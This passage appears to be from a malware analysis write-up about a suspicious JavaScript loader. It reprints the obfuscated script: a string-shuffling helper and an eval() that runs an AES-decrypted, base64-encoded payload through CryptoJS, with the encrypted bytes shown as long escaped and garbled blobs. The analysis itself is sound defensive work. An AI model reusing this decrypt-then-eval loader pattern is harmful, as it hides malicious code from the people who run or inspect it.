1D\u00F8\u00A8\u00E3\u0016\u003F\u00B8\u001C\u0069\u00FC\u007E\u00E5\u0067\u003F\u00B9\u00A7\u00E9\u008A\u0054\u0008\u0069\u008E\u00F3\u000F\u0099\u0078\u0089\u00E0\u0009\u00CE\u00C7\u00F9\u000E\u00AA\u009E\u00C4\u00DF\u003B\u0065\u0028\u0099\u0055\u0064\u00A0\u0065\u00CF\u006F\u001A\u008A\u00DE\u0060\u00EA\u00D8\u00FA\u00D1\u007F\u00F4\u00CA\u00CA\u00C7\u00D1\u006C\u002B\u00AF\u00C7\u00C1\u00A8\u009C\u00EA\u000D\u00B9\u0058\u00FA\u00BC\u0093\u002B\u006F\u00C8\u001C\u0012\u003B\u0071\u0063\u0023\u007B\u00EB\u0090\u0078\u0034\u0064\u009C\u0031\u00BF\u001B\u0042\u00CF\u0051\u00A7\u003E\u00A1\u005F\u0075\u00F3\u0026\u009B\u0000\u00D5\u0026\u00FE\u0077\u0038\u0085\u000C\u00E1\u00DB\u0096\u0020\u00C3\u0005\u00A0\u009E\u00BA\u0035\u00DD\u005D\u0011\u0095\u0020\u000F\u00DC\u00E0\u003F\u00C7\u0052\u00AB\u00EC\u0001\u00C0\u0021\u00BB\u0087\u0030\u0033\u00F1\u00A7\u008E\u0062\u00BF\u002E\u0076\u0050\u00CE\u005C\u005C\u0045\u008C\u0069\u00B9\u002C\u0084\u0080\u005F\u00DD\u00B9\u0030\u004D\u005C\u00FD\u002A\u00CD\u0003\u00AD\u00EF\u0088\u00C8\u005F\u0008\u008F\u00EF\u00EE\u0049\u00B6\u00C2\u00A3\u0094\u00BB\u00F1\u002A\u002E\u003F\u00C0\u006C\u0048\u00D2\u0056\u00E0\u004A\u0008\u004F\u0051\u00E3\u00C5\u0094\u00D7\u00E1\u004A\u0021\u000C\u0041\u0007\u0086\u0044\u00CA\u0019\u00E3\u00D8\u0095\u00A0\u00FE\u009E\u00C2\u00E1\u005E\u00BF\u00BB\u0002\u00A4\u0002\u006E\u0048\u00B6\u002C\u000B\u0067\u0072\u0062\u0002\u00B7\u00F3\u0042\u0082\u008C\u00E6\u0049\u00AC\u00F7\u0028\u00BE\u003C\u00E3\u005D\u0057\u00F3\u0073\u00F8\u0010\u00A7\u004F\u0099\u0062\u0029\u003D\u0015\u009D\u00C9\u008B\u00D7\u0001\u00C6\u0089\u0099\u00DF\u00B8\u00FA\u007F\u00AB\u0089\u0064\u0055\u0060\u0062\u005B\u00D1\u00E6\u003A\u00B2\u00DE\u0045\u00BD\u0083\u0018\u007D\u00DC\u00F0\u001E\u00DB\u00C1\u00D1\u00ED\u0041\u0010\u0057\u00D1\u0096\u0032\u00CA\u0022\u009A\u0060\u00FD\u0043\u001B\u00A8\u0073\u0082\u0041\u0037\u0002\u008F\u005B\u00CB\u0077\u001B\u0073\u003C\u0072\u00CD\u00E8\u007E\u008B\u0015\u0058\u00D5\u0010\u0003\u008A\u0015\u00C1\u00D3\u0050\u002C\u0065\u00F0\u00CE\u0020\u00E6\u005A\u009E\u00B7\u007C\u0010\u00BE\u0042\u0045\u006F\u00DC\u002E\u00D6\u00F8\u00BA\u0019\u005A\u00AB\u003C\u0025\u00C2\u008C\u0059\u0034\u009C\u0067\u00B2\u0093\u00DF\u00E7\u0095\u004F\u00B8\u0046\u000D\u0096\u0015\u002C\u00D6\u0004\u0079\u00FA\u0070\u003E\u00AD\u00FE\u0023\u0027\u00C3\u00F6\u00D1\u00D7\u00D5\u00F7\u00BD\u0048\u00CF\u0014\u0010\u0097\u0062\u00A3\u005E\u002B\u0093\u004E\u007B\u00F9\u00D4\u00D3\u0064\u001F\u00D7\u00F7\u0018\u00C0\u0083\u00A1\u00AC\u00C1\u00F0\u00BB\u0035\u006F\u0007\u0032\u0060\u003B\u00CB\u00D8\u0051\u0042\u00FC\u00F1\u0026\u003C\u0098\u0043\u006C\u00D1\u006E\u00B7\u0024\u0042\u00CE\u0016\u004D\u0040\u0010\u003D\u0092\u00A8\u00AB\u00C6\u00D0\u0078\u00EF\u0079\u003A\u0069\u0018\u002E\u00FE\u0089\u0023\u00FA\u0085\u00B7\u0052\u00F3\u007D\u006E\u00C3\u0092\u007A\u00D0\u005B\u008B\u00DD\u007C\u00DC\u002E\u007E\u0092\u00D0\u0065\u0008\u00CE\u00DF\u00FE\u00CC\u003D\u00C0\u00A1\u00C2\u00D6\u0020\u0005\u00A3\u0066\u00DD\u00CD\u00CC\u00E4\u0063\u00E0\u00DD\u00F3\u0018\u000D\u0075\u0007\u006D\u0066\u000A\u00AD\u00D2\u008C\u008F\u00B0\u0006\u00C8\u00C7\u00B1\u006B\u00DC\u00CC\u00C0\u00A1\u0065\u001D\u0072\u00BC\u0012\u0044\u0093\u000F\u00C0\u00A8\u00F7\u00B9\u00A9\u0091\u00B8\u0049\u005D\u00C7\u00B5\u002A\u0018\u0041\u004B\u0040\u0036\u009C\u0046\u0002\u00A6\u00C1\u0035\u008D\u008D\u00D0\u008F\u00ED\u00BA\u00CA\u0072\u0089\u00DC\u004A\u0008\u0067\u006F\u00F0\u0009\u0089\u00EE\u0012\u00C0\u0045\u0094\u003D\u00B4\u006F\u0069\u0047\u00C4\u005D\u00B8\u00E1\u00BC\u00E8\u005B\u0020\u00D1\u0080\u00B2\u00DC\u0026\u00CB\u0007\u0031\u0095\u0006\u002F\u000F\u0052\u0051\u0065\u0001\u00B0\u00ED\u00B2\u0011\u0029\u00FE\u0017\u0087\u00B3\u002B\u00BF\u0002\u0019\u00A1\u0034\u0048\u00C3\u0075\u004C\u0099\u00AE\u00D7\u00CC\u0048\u00F3\u00D5\u008A\u0021\u00E5\u00BF\u00BC\u00B5\u005A\u00E6\u00D7\u0014\u00E3\u007F\u0024\u005C\u00EE\u008A\u006B\u008C\u00F1\u004C\u0044\u0091\u004E\u00E5\u000D\u00E7\u0090\u0081\u006B\u00E7\u00B6\u008A\u00CB\u00BB\u000B\u006B\u0051\u0036\u00F1\u0095\u0031\u0049\u00EE\u00A6\u008D\u004D\u0070\u00D1\u0031\u003E\u00A8\u005F\u0099\u0084\u0091\u00C4\u0035\u00FE\u0090\u00CF\u0086\u00C2\u001E\u00E0\u0093\u0069\u0031\u0040\u00B8\u0005\u00CE\u00F2\u00C7\u00CF\u0017\u0053\u00A7\u00B5\u0090\u0098\u0065\u005C\u00D8\u00FF\u0041\u00B3\u00FB\u0017\u004B\u00F2\u003A\u00B5\u00C8\u0067\u00AE\u0064\u0092\u0061\u00FC\u005F\u00E3\u0040\u00B8\u00FC\u000C\u00AB\u0058\u0091\u0049\u0069\u0089\u00A7\u0015\u0038\u0048\u0076\u00D8\u007B\u0067\u006C\u00AA\u0095\u00F6\u00E0\u0068\u000D\u0072\u00F9\u00E4\u0092\u0071\u0075\u00EE\u00F0\u00AF\u0069\u009D\u0061\u00BF\u009C\u00DE\u00A7\u00DD\u00BB\u00CB\u006F\u003C\u006B\u0083\u00EF\u00FA\u005A\u00FC\u00FF\u0093\u0097\u00EB\u0053\u0026\u00F7\u00A7\u001B\u000B\u004A\u00D7\u00AA\u00D8\u00B2\u003D\u00DC\u0086\u003C\u00BB\u005A\u00D5\u00B0\u00CB\u0061\u00F1\u0012\u00B5\u003F\u00A3\u0038\u00EC\u00DE\u0049\u00F2\u00F7\u00B6\u00BC\u005E\u00DA\u0008\u002E\u0053\u0060\u00E8\u005B\u00C7\u00F4\u0013\u00BA\u004E\u0066\u0033\u0051\u0088\u00D1\u00C1\u0022\u000E\u00AB\u0084\u00BB\u002E\u0097\u00EB\u002D\u0075\u0008\u0025\u0037\u0078\u005E\u00F2\u0087\u0048\u0067\u00B9\u0088\u0031\u009C\u000D\u008A\u005D\u0051\u0081\u00C8\u00D5\u007D\u00A2\u00FB\u00BC\u00DC\u0008\u0042\u002D\u00FE\u00EA\u008F\u002F\u00F1\u002F\u0081\u001D\u0069\u0010\u0021\u00C3\u0081\u0054\u0040\u0085\u006B\u00D1\u0028\u0029\u007D\u0081\u0059\u00B6\u006F\u0008\u0044\u00F9\u00F6\u00B2\u0079\u0091\u0077\u00D4\u0040\u00C8\u0085\u0037\u008A\u004C\u0034\u00D4\u009A\u002F\u00F0\u0058\u00F6\u0014\u000E\u00FA\u00B6\u0094\u0089\u00BA\u00E5\u00E3\u0058\u0072\u00E5\u0033\u0087\u003F\u00E3\u001E\u0030\u0021\u00FB\u0034\u00C8\u00E0\u0044\u007E\u003A\u00CF\u00C8\u002D\u00BE\u00A4\u009B\u0060\u004C\u0077\u00CE\u001D\u0053\u001E\u00CE\u00D5\u00E4\u0032\u00B4\u0032\u004A\u009F\u00D1\u00E4\u0068\u000F\u00C9\u007B\u0098\u00F4\u0074\u002E\u0001\u00F4\u0082\u0097\u00D6\u000F\u0082\u0006\u0049\u0016\u00BF\u0077\u0057\u00B7\u0088\u0019\u0087\u00E4\u0092\u0036\u0036\u0076\u0075\u002F\u0028\u0093\u008E\u0089\u004B\u0068\u008F\u0091\u0097\u00BC\u005F\u003C\u00EA\u008D\u0094\u00D0\u00CC\u0050\u00D8\u00C1\u009A\u0074\u009F\u0064\u00CB\u0014\u0089\u0019\u0044\u00EB\u004E\u004A\u00CF\u009A\u0007\u00FA\u0087\u0009\u006E\u00CB\u00CF\u00FD\u0025\u0099\u00B7\u00A3\u000C\u0054\u0029\u007F\u00CA\u007F\u00BD\u0080\u005C\u0071\u0067\u009D\u0040\u002E\u008B\u005D\u0074\u006E\u0091\u0092\u0035\u0093\u00F4\u000A\u00E0\u0031\u00D2\u0039\u00EE\u00BD\u00D7\u0063\u00F6\u0096\u0062\u00F7\u005F\u0086\u0051\u0052\u00DE\u0021\u002E\u0095\u00F0\u0058\u0056\u0080\u004C\u00D9\u0062\u0088\u009B\u0095\u0046\u00F7\u00D8\u00B7\u0076\u0083\u00C0\u00ED\u0014\u005D\u0041\u00CB\u00BE\u0011\u00D6\u0014\u00CF\u0030\u008F\u006F\u0032\u00A6\u002D\u0017\u0075\u00AA\u0011\u003C\u0009\u00F2\u00C7\u00BB\u00CF\u00C9\u00C3\u0052\u00CD\u003F\u0067\u0011\u0002\u00F2\u0002\u006B\u00B5\u000E\u00DE\u0048\u003A\u008E\u000C\u00A2\u00E4\u00BD\u00BF\u0095\u00D9\u007B\u00CF\u007E\u003F\u0082\u00B0\u0041\u00AC\u00AC\u0091\u004B\u005A\u0038\u0039\u001D\u00D4\u00CA\u00E9\u0080\u00CD\u00DA\u00E5\u0018\u00D1\u0047\u00FA\u007E\u00E4\u00EA\u00D9\u0084\u0043\u0099\u00BF\u00A7\u00D8\u00B7\u0005\u004E\u00DF\u0054\u0060\u0080\u00E5\u0048\u0044\u00E5\u00D2\u0057\u0093\u00C7\u00F7\u0020\u0020\u0027\u0052\u000F\u00CD\u009C\u00D2\u006A\u00E2\u0007\u00E9\u0005\u00A0\u00D1\u00AC\u00F7\u00C8\u0001\u00E9\u00C8\u0046\u0099\u0086\u0065\u00B4\u001B\u007E\u007E\u007C\u00F1\u00B9\u00E9\u0063\u00AE\u0044\u00FD\u0070\u00C5\u00D8\u001A\u00D8\u0099\u00A5\u0043\u00D4\u00A9\u001E\u001D\u0060\u000F\u0023\u0020\u00D6\u00FD\u000D\u00BF\u00EE\u0066\u001E\u008B\u0095\u009F\u0072\u00E1\u00A1\u0006\u0097\u00DF\u007C\u00FA\u0086\u00E2\u00D9\u0014\u0097\u00F1\u00D0\u003C\u008F\u0026\u004F\u003A\u00E4\u00CD\u0000\u00EC\u000B\u006E\u000E\u0021\u00F3\u00F1\u0058\u002A\u0028\u00CB\u006B\u00B6\u0001\u000F\u0012\u0078\u00F4\u0092\u008F\u00B8\u0098\u0096\u00E8\u00A8\u0015\u000F\u004F\u007C\u0084\u001D\u0062\u00EF\u00B4\u00CD\u00A6\u0049\u0039\u00CF\u003B\u00BB\u0071\u0050\u00C2\u00CE\u008A\u0058\u00FA\u0034\u00C0\u001F\u005F\u007A\u00E6\u006C\u007A\u00C2\u0057\u0043\u00A6\u0016\u0053\u0026\u0060\u00A6\u0053\u009E\u00E2\u00E9\u0047\u0048\u0089\u0095\u00F2\u00BE\u007E\u006C\u004C\u00E6\u0003\u0024\u00AC\u00EA\u004E\u00B2\u0037\u0049\u002C\u00B1\u00B9\u00C1\u0085\u00C9\u00EA\u00D5\u0057\u003A\u000F\u0012\u00A6\u0018\u0033\u00C9\u0069\u00DC\u000A\u0001\u002B\u008E\u001C\u00EB\u0031\u0033\u00F8\u006D\u0059\u00C0\u0075\u00E9\u0056\u009F\u0073\u0093\u0018\u00B4\u00E7\u0078\u00C3\u001A\u0072\u0030\u003F\u0068\u0066\u00F6\u002B\u001A\u0094\u0004\u0044\u0067\u00A5\u009C\u0038\u0099\u00DA\u0010\u0008\u00C6\u0017\u00E3\u0061\u00D1\u005D\u00B5\u00E2\u009D\u00C6\u0087\u00FB\u003D\u00A9\u0028\u0018\u000D\u007D\u00FA\u006C\u00D2\u00B9\u008D\u000E\u007E\u0092\u0095\u0072\u003E\u00B5\u007B\u00AE\u0097\u0005\u00E5\u005D\u0090\u0003\u0091\u009C\u0053\u00E1\u008B\u00E5\u00A5\u00F6\u00E9\u00F3\u0077\u00C9\u00AC\u0010\u0064\u00F2\u00EF\u00B4\u0060\u0080\u007E\u00CF\u00FB\u00A4\u0038\u0025\u0032\u00A5\u00CE\u0046\u00DD\u0087\u0054\u0077\u0036\u006A\u0049\u0024\u00BC\u0012\u004D\u0027\u0039\u0062\u0034\u00D7\u006D\u007F\u00C5\u0026\u0072\u0068\u00EE\u00DD\u00FA\u0092\u001C\u006E\u00CE\u005D\u00F8\u00F5\u007B\u00FA\u0022\u00D3\u004D\u0052\u007F\u00AC\u0074\u005F\u002A\u0045\u004C\u0043\u0068\u0066\u002C\u001D\u006A\u003C\u0000\u0077\u008C\u006D\u00FD\u0038\u0012\u001E\u00D1\u0098\u00A7\u0093\u001B\u00B6\u00E8\u00A3\u00F1\u007C\u0099\u00E7\u0077\u0012\u00CA\u0061\u003F\u0017\u0041\u0027\u00E2\u00E6\u008D\u007C\u00E9\u00B0\u006E\u0099\u00D1\u00B9\u00DC\u00CD\u00DE\u001B\u004A\u00F5\u0026\u007C\u002A\u0064\u008C\u008D\u0068\u00FF\u003F\u0073\u003B\u0082\u0098\u0089\u0079\u0098\u00B2\u00A1\u00B8\u0037\u0004\u00F4\u001F\u00EA\u0000\u0015\u003C\u0053\u002A\u0073\u0051\u0073\u00F9\u0018\u00A5\u0034\u0080\u005E\u00BE\u000C\u00E9\u00D4\u00ED\u009A\u0023\u002C\u0036\u004C\u00D5\u00D5\u009E\u0031\u0085\u0001\u00DA\u0043\u002D\u00FC\u00B4\u00B9\u00C9\u006F\u00EA\u0031\u0051\u00F4\u00DF\u0039\u0058\u008C\u0053\u0070\u000F\u0040\u00FA\u00E2\u0084\u00DB\u0016\u00A4\u000D\u006A\u0074\u0068\u0068\u009B\u0056\u002D\u00CC\u002B\u0054\u0026\u00F8\u00DB\u00AC\u00AF\u00A7\u00FB\u0001\u00A8\u00CF\u0036\u00F6\u0095\u0072\u00B4\u00B2\u0054\u005F\u0099\u00BB\u00CC\u006C\u0060\u0087\u007C\u00AA\u001B\u00CA\u0001\u00CB\u0097\u0050\u00B7\u002C\u001C\u0085\u0049\u0012\u0056\u0011\u00CC\u0021\u0096\u00E9\u003E\u0071\u008A\u00B7\u0090\u0087\u00D1\u0043\u00B7\u0028\u00EF\u0091\u0065\u00C7\u008F\u005B\u005E\u0004\u00E8\u0082\u0084\u00E1\u0036\u0024\u00B9\u00DB\u00FA\u0058\u001C\u003C\u005D\u0078\u00E4\u006C\u00E9\u00F5\u0013\u0020\u00E7\u0009\u00E0\u0016\u0062\u0024\u0042\u00CD\u005B\u001E\u00B7\u0020\u003D\u00C3\u000B\u00DD\u005A\u0040\u0031\u0089\u00C5\u0022\u00F6\u003E\u0054\u0052\u00C1\u0099\u0043\u00BF\u00C2\u00A4\u0038\u00CA\u00C4\u00B9\u0069\u0044\u00DE\u0016\u0085\u00A9\u00CB\u00F3\u0098\u0043\u00C8\u00C1\u000F\u004F\u006B\u0010\u0025\u0000\u00F3\u00C1\u00EC\u008E\u007A\u00CB\u00D3\u003F\u00AA\u00F7\u00C4\u007E\u00E8\u00BA\u0009\u005B\u001A\u0078\u005E\u0017\u0001\u00C3\u00B1\u00A2\u006B\u002B\u0043\u0014\u009F\u0016\u0013\u00D0\u0032\u007F\u00F8\u00FC\u006D\u00A1\u0026\u00F9\u0093\u006D\u0027\u00F8\u00C2\u008B\u00E3\u00CA\u0001\u003B\u0017\u0084\u005C\u0036\u0092\u00A9\u0088\u00D3\u0042\u0027\u00D8\u001F\u008F\u0021\u0013\u00D0\u0008\u0020\u00D4\u000D\u0088\u00F8\u0045\u00F1\u0089\u0088\u0013\u0017\u005B\u00C7\u0031\u004F\u0023\u00DB\u002F\u0055\u0032\u009E\u0098\u0052\u00C6\u004D\u00B6\u00D8\u007A\u0032\u00F4\u002D\u00A7\u00E8\u0086\u0066\u003C\u00EC\u004C\u0076\u00F7\u0020\u00E0\u004C\u0088\u0054\u000B\u0030\u00F8\u00FB\u00CA\u0050\u003B\u0099\u008D\u005B\u00D0\u0036\u005F\u002C\u003F\u00BC\u0068\u007B\u0045\u00B9\u00A3\u00E4\u0081\u00D7\u00B9\u00CB\u00EB\u004B\u00F2\u0085\u00EA\u0027\u0065\u000D\u006D\u0074\u00F5\u007B\u00C5\u009E\u001F\u001C\u00CD\u0010\u000B\u0079\u00C5\u0027\u00D4\u002A\u00D8\u001F\u0057\u0001\u0017\u005A\u004A\u005A\u0043\u00B4\u00A6\u0059\u00E0\u00FB\u008A\u0009\u00BC\u00E4\u005F\u0047\u0092\u00B7\u00AD\u002C\u0052\u0073\u000B\u008D\u003B\u0071\u00B2\u00C0\u00D2\u0029\u0031\u0028\u00D7\u0009\u0075\u00F8\u00CF\u00ED\u009B\u007A\u0063\u00D8\u005C\u00B9\u00AA\u00A3\u0018\u0055\u00D6\u0070\u00E3\u002B\u0089\u004E\u00B6\u001E\u00FC\u001B\u00D7\u0056\u003B\u007F\u00F2\u00B8\u00BB\u00FF\u0088\u00B6\u0006\u0009\u0008\u009C\u0069\u0020\u006A\u00C7\u0093\u0091\u007C\u006B\u006A\u00C9\u00A4\u009D\u0080\u006B\u006D\u0031\u0010\u007D\u004E\u0062\u0047\u000E\u00C7\u0082\u00D0\u00A1\u0098\u009B\u0047\u0077\u0042\u00C7\u005A\u003F\u00F9\u005F\u0070\u00AF\u00EE\u0086\u0096\u00B8\u00A9\u0026\u008B\u00BC\u0008\u002B\u0014\u00C4\u0084\u000F\u0052\u0026\u000B\u0027\u0084\u006B\u004A\u00F9\u0040\u0002\u00C7\u0022\u0065\u003A\u0079\u0049\u0005\u0083\u00EA\u0001\u0043\u00E4\u001F\u00C0\u00AB\u0036\u007E\u0061\u0010\u002E\u0005\u002D\u00F7\u008B\u0046\u00D0\u009F\u0010\u00A2\u0067\u00BB\u0094\u00CD\u000E\u00A1\u0049\u00E2\u0082\u0043\u009F\u00A9\u00BA\u0051\u00FF\u0060\u00F4\u0063\u006C\u00E4\u0007\u009B\u00A2\u0069\u00DB\u00AA\u00F0\u008B\u0080\u00D5\u00CE\u008F\u006A\u0076\u0082\u0030\u0034\u00B1\u009E\u009E\u00D2\u009F\u00AD\u008C\u00B1\u00EB\u0063\u00DC\u00F2\u0047\u0028\u00AC\u00F4\u00EF\u0054\u003B\u0066\u00B1\u0005\u00FF\u008C\u007B\u001A\u0011\u002F\u001A\u0074\u0048\u0024\u0046\u0047\u008A\u0032\u00E6\u00F4\u0042\u00A8\u0099\u00EF\u0016\u0040\u00D2\u00F2\u0093\u00E8\u0066\u00F3\u000E\u0058\u00E1\u00A5\u00D8\u00B5\u00EC\u00F5\u0040\u009F\u0016\u0017\u00EC\u0065\u0019\u000D\u001D\u00E6\u00D7\u006E\u006B\u0009\u007C\u003F\u0007\u00D3\u00C8\u00F9\u0017\u009E\u00E7\u0074\u005E\u00AA\u0083\u00EA\u00A9\u0005\u00E9\u0033\u000E\u00DB\u00D8\u0081\u0097\u0089\u0060\u00B0\u00A3\u00DA\u0068\u009F\u001B\u00CC\u0054\u003B\u0035\u009F\u00F4\u008D\u0062\u00FB\u00F5\u006D\u0090\u00C5\u00E0\u009D\u00CD\u0080\u0030\u00DF\u0042\u0073\u00AE\u0033\u00A5\u0015\u009F\u00D9\u0008\u0056\u00B0\u0096\u00C4\u002F\u0040\u002A\u00B6\u00B0\u0053\u00B7\u00AB\u0021\u003F\u0054\u00C7\u006A\u00A5\u00BC\u0068\u009D\u00CC\u00B0\u00A3\u0004\u0019\u004B\u0027\u006C\u00A1\u0035\u0028\u00D1\u0057\u006A\u0066\u0054\u0047\u00E0\u007C\u0039\u0013\u0079\u0056\u006B\u00CE\u001E\u00CB\u0006\u0082\u00AB\u000C\u00EC\u0099\u00A3\u00A0\u00B9\u00BD\u00A9\u009A\u0062\u00F1\u000E\u0041\u00DC\u00CF\u0069\u0076\u00B0\u006D\u00BA\u00F6\u00D1\u0049\u00F9\u001F\u004D\u0031\u0095\u00C5\u00BC\u0013\u0071\u00D0\u00D5\u0063\u00B4\u0027\u00A6\u0019\u0051\u0002\u004B\u00E2\u0086\u0026\u00EF\u003A\u00B6\u005B\u00B5\u0032\u00A8\u0049\u00D6\u00F3\u001E\u002C\u0035\u001E\u0000\u007A\u007C\u006B\u0075\u0036\u00F9\u000F\u00AB\u00A3\u00B2\u00BD\u004E\u00F1\u0049\u0011\u00DC\u00D0\u00AC\u0074\u00B9\u0009\u00EF\u0029\u00B4\u0075\u0002\u00DD\u0058\u0018\u008C\u0000\u0006\u00BE\u005D\u0041\u008F\u0073\u004C\u00EC\u0029\u000D\u00D1\u009F\u003D\u00CC\u00F3\u0001\u0039\u0038\u00D8\u00A5\u0054\u0044\u005D\u0072\u0098\u005F\u00CD\u0092\u00A1\u00A3\u00AF\u00D3\u0086\u00F0\u00BC\u006B\u00E5\u00F1\u0008\u00CE\u0053\u00B5\u00D2\u0055\u00C6\u0019\u0052\u0040\u003E\u005E\u008A\u00EC\u009C\u0012\u002C\u00D5\u00EA\u000B\u00C6\u0057\u0040\u0060\u008B\u00E8\u000F\u001A\u00A0\u008C\u0021\u00BC\u002A\u003B\u0028\u00A2\u0077\u00A3\u00EB\u00E6\u0035\u0068\u0024\u0098\u00AA\u00FD\u007F\u0096\u004B\u00EB\u0054\u0049\u0060\u00B2\u0055\u00BF\u001F\u006C\u0013\u006B\u00AA\u0010\u00BF\u00EC\u00B2\u00B9\u00A9\u0029\u0086\u0068\u008F\u0037\u0046\u0017\u0001\u000E\u000C\u0062\u0010\u00C5\u00F4\u0089\u00FD\u0045\u009F\u0026\u005C\u003F\u005C\u0027\u00F3\u00BF\u009C\u00C9\u0066\u007E\u005B\u0043\u0016\u00DA\u000F\u0097\u0070\u0065\u000F")))},CryptoJS[_$_9b39[4]][_$_9b39[3]][_$_9b39[2]](btoa(unescape("\u00DB\u00ED\u0098\u006C\u00B1\u0089\u00A1\u0047\u0095\u00F2\u008A\u00B3\u0017\u00AF\u004C\u002D\u00B2\u0007\u0037\u0029\u00CF\u0054\u00BC\u0093"))),{iv:CryptoJS[_$_9b39[4]][_$_9b39[3]][_$_9b39[2]](btoa(unescape("\u00E4\u0075\u0026\u0014\u00CA\u004A\u0037\u002F\u0038\u0009\u00FC\u00C6\u000D\u0009\u0030\u008A")))}).toString(CryptoJS[_$_9b39[4]][_$_9b39[5]]));
Deobfuscating it with deobfuscate.io and some manual work, several sections of the suspicious JavaScript can be identified. Essentially, the main function of this JavaScript was to decrypt and executed the base64 encoded payload using AES encryption with a dynamically generated key/IV.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
var _$_9b39 = function (n, w) {
var r = n.length;
var j = [];
for (var e = 0; e < r; e++) {
j[e] = n.charAt(e);
}
;
for (var e = 0; e < r; e++) {
var d = w * (e + 439) + w % 33616;
var a = w * (e + 506) + w % 38477;
var v = d % r;
var p = a % r;
var x = j[v];
j[v] = j[p];
j[p] = x;
w = (d + a) % 3525268;
}
;
var c = "";
var q = "";
var m = "%";
var t = "#1";
var o = "%";
var u = "#0";
var k = "#";
return j.join(q).split(m).join(c).split(t).join(o).split(u).join(k).split(c);
}("Ats8ep%%e6Sr%prB%feUseEynatcc4%ad", 1198358);
;
;
;
;
;
;
;
;
;
;
;
;
eval(CryptoJS[_$_9b39[1]][_$_9b39[0]]({ciphertext: CryptoJS[_$_9b39[4]][_$_9b39[3]][_$_9b39[2]](btoa(unescape("bû3ÀÜ\\Qbð#S=\"ÔIõ[@ÓK¬È5 fZ~=ÊæÍCí¹ VÓ#¬ù$¾ßJ×0d¾ÉC'pÝPk§ª¼ºÃ1^ç$ÃeiÛ¡¨yàV½Ä¡\nF{Ëv¶Kì¯pK3@ðtaùv ¿Zz¾¶I[((ÝCÖC¡+¸æk;,\nÙx^èçý(yFMît·ý©æ
¨á§DL!PV̪ïveÍ!uAoËn¥Uô3C\n\\ôÙ%:Æáv5ïùÔ½NH(Vi@<±áÙ¾^\"T&þ\"ØôuxRÚ7ºF¦Ô¶¿/aÉVH
m1fùú/ñ6y ç²/¶¹§¬ÅÊZ3>oCvg\nС»/&Ê0ë#ǬWs/(J¥ìÑ[Ew0GÄ;Ëé3é{öѤ\nªA^ú«ôhȦ7ì!VرÌ#t/{
7lØÈj:³q)¬¹MïøâDå¿üSÏ&ÎòFYMñ,áV@X¨¬òc
s´µ³A7ø4ôYÐJµÆfDB&òøu¥lA¸aÔèÝÉü}~åHC..Mæxú¡÷ì³o:ϧ¿óQ| 0Àþ;RA˯⨣'uÞ¨ÿ\\Tiõ{ Ïey¶ü7C|ÍhæÓç¸@8ÊC½v¯\rÚI_>¢óÕEøÝWSDk;§ßJ@ìèæ@yW ÿBmWU¡?n×÷¢òz\r^Î-ÅÃq*z=õÃÊ-iK[aÍUÆæû8¡ûѺb¾1rïÀÖVÿÚþÊr¼%y¸UÅqÔY0\"ÌÈ][w ¢8T?¼Í9ÞFWEÿ/,2ê)5¡÷HÖ\nLDÒ+#ù\"DÖa¯KÜ3ó¡úPÎ$ÉEa§¼tX¶Ôj»'ضE}0]4#B[= ó2ê@k#ê©=lzÊ#ÌX_HÏÐOvÀxr\rq\"c¶}éÓK§í÷«-¹òé/bî<@À§e¹/Üä¼ýç#,f\n$ò䮣Áh}XÕG[\n*¶A:¨Ý|]á¸ú ¸ÁD]n}4v·ÔYLÍ-G ê*9¥ßAÿÆ;à%ôÀû[8ú17ºnÛ½tOG9¸Gö¿ç)J1ÈE´ÿ R¼þÃj}ä¨~T²XõÝDTùgr°ÝöGÃÕ£®<Q>Þ¼Ae$gEu.¯7ÍbciÄ;e÷ÉCü^XF*YtÐAÓi'ES§ôe<ÕÎfw¡Ø;êT?;î轶@þ qÚÔ>ebñÊësa¤¶kªÚÚú{^SIíïX]Al
¦M¨
IBjÚlÍÝÃI÷äII'ä¨Eiõ\n EͼuGV¾*&Àè|N\r;èºbGìÔ= #T©\"éÝzFÑ\"t Ko?N±ÖÙ=êïD`MH9ØÔ)âVäI£V®¬RØû~xm¯ée ¤À}À
rÏûÝùçH=í¨Uúpó4áÄ\r¡U9¾pxQ0º#ÂøoEµ¾¥1xx¸.Ài7ã}%+ïUâx)§gYj¤½®qWCIÔ4iã
+c»§ß\\Æv?ÙµÔØdäúø8#æ¨\"¶GÝ^ÖÎ>¥ÇqN Ê#¦xýÂS?þ¡+QæÿÅEsºaJ®ÈÏ6Dþr¿±\\QëÉó ¸qúFÔrEªöâ¡\nI>ËËé°06z¦* Û±¨[[ê.«\r]£ èÊ×=/9ok\r:%ÌîÞl7}Dbb3GÙ\r£áõCó¤ónq!Öçv4¬!+ÓÂòr+ƨCöÙ¹Og{@ ü?ÓynéÇê§ T0DaÜöWÅ&34y!¼§2×Ê)1
1E Ùø%Øäú¸¥üæ/ð£!äqé'zpr×-â§H÷râÇ©Ôçñv1çÓïÔØÅÿéAêé-Zl¨vrr<æ¡Çï»Un0ävùú,d®\rØ@ZÄ9äjµaþºpZ:3öâáv³h2Ì@ûå)RüË\nßìûª4<¡Ô¡KÇroÏ×.ɵÆ9E¢xRè¬åO@îô%¸ÒR(íå)Ýv\n¹?Øë<Ú¡Znj4*q\\⹨GF©^VS>í(æPªÃ-ÁN%}[0¡<ü{Ñɳ .e4\"ÔyS}Ð[¢`½\nm}Õ¦gÈn|kÈ\rä&.¿D ÓG<j(ÜòA¯2¬÷}'L³Ñ··Uì%ªÐ¾h\"Àãs¡¾ÛÃH6CF$?ú[;êïÁ`¡ÝñuÜOêùd\nNø¨ã?¸iü~åg?¹§éTióxà ÎÇùªÄß;e(Ud eÏoÞ`êØúÑôÊÊÇÑl+¯ÇÁ¨ê\r¹Xú¼+oÈ;qc#{ëx4d1¿BÏQ§>¡_uó&Õ&þw8
áÛ Ã º5Ý] Üà?ÇR«ìÀ!»03ñ§b¿.vPÎ\\\\Ei¹,_ݹ0M\\ý*ÍïÈ_ïîI¶Â£»ñ*.?ÀlHÒVàJOQãÅ×áJ!ADÊãØ þÂá^¿»¤nH¶,grb·óBæI¬÷(¾<ã]Wósø§Ob)=É×Æ߸ú«dU`b[Ñæ:²ÞE½}ÜðÛÁÑíAWÑ2Ê\"`ýC¨sA7[Ëws<rÍè~XÕÁÓP,eðÎ æZ·|¾BEoÜ.ÖøºZ«<%ÂY4g²ßçO¸F\r,Öyúp>þ#'ÃöÑ×Õ÷½HÏb£^+N{ùÔÓd×÷À¡¬Áð»5o2`;ËØQBüñ&<ClÑn·$BÎM@=¨«ÆÐxïy:i.þ#ú
